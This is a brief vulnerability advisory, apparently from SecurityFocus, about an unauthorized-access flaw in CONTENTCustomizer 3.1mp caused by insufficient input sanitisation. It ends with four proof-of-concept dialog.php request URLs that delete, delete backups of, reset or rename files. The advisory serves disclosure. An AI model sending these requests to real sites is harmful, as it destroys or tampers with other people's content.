source: https://www.securityfocus.com/bid/26437/info CONTENTCustomizer is prone to an unauthorized access vulnerability because the application fails to sufficiently sanitize user-supplied input. An attacker could exploit this issue to delete arbitrary files, rename files, or reset the content of certain files. CONTENTCustomizer 3.1mp is vulnerable; other versions may also be affected. http://www.example.com/dialog.php?action=del&doc='+pagename // Delete http://www.example.com/dialog.php?action=delbackup&doc='+pagename // Delete Backup http://www.example.com/dialog.php?action=res&doc='+pagename // Reset http://www.example.com/dialog.php?action=ren&doc='+pagename // Rename